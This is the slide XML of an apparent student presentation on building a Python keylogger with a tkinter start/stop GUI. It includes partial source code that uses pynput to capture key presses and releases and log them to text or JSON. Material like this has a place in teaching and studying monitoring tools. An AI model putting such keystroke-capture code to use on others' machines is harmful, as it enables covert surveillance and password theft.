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github.com/techtrainer20/TNSDC"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048590" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329782" y="1034321"/>
            <a:ext cx="12726648" cy="637539"/>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751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 </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dmi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> College of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Engineering-IT</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5"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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_button</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5" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="341995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904352" y="1692540"/>
            <a:ext cx="7487695" cy="752580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097157" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250407" cy="156340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20" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901232" y="0"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="0" dirty="0" sz="2000" i="0" lang="en-US">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p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr b="1" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:endParaRPr dirty="0" lang="en-US"/>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dirty="0" sz="2400" lang="en-IN"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="2400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN"/>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58649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endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Proposed System/Solution </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r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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581192" y="323232"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629435"/>
            <a:r>
              <a:rPr b="0" dirty="0" sz="2400" i="0" lang="en-US">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909017" y="233938"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" vert="horz">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1800" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</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rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048603" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="581192" y="936061"/>
            <a:ext cx="12316271" cy="4206750"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="198375" compatLnSpc="1" lIns="0" numCol="1" rIns="0" tIns="198375"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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</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11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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design the GUI: Create a simple GUI using </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> that includes a start and stop button.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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to capture the key presses and releases.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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to generate a JSON file that contains the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> keylogging data.</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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.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rgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>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0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.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a:xfrm>
            <a:off x="380989" y="477169"/>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3" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>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a:xfrm>
            <a:off x="218429" y="-431231"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097154" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955279" cy="466790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9"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0" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Initialize the variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        )</a:t>
            </a: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a:xfrm>
            <a:off x="296711" y="-427071"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
